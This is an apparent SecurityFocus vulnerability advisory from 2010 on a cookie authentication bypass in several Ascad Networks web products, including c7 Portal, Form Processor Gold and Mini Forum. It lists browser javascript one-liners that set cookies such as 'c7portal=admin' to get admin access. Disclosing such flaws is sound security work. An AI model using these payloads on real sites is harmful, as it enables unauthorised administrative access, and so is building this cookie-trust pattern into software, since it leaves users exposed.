Multiple Ascad Networks Products Cookie Authentication Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following example data is available:

For c7 Portal:
javascript:document.cookie = "c7portal=admin";

For Password Protector SD:
javascript:document.cookie = "c7portal=admin";
javascript:document.cookie="c7portal=admin;path=/";
javascript:document.cookie="cookname=admin;path=/";

For Form Processor Gold:
javascript:document.cookie = "FormProGold=in";

For Guestbook Creator:
javascript:document.cookie = "ascadnetworks_gbook_admin=in";

For Mini Forum:
javascript:document.cookie = "admf=admin";


 

Privacy Statement
Copyright 2010, SecurityFocus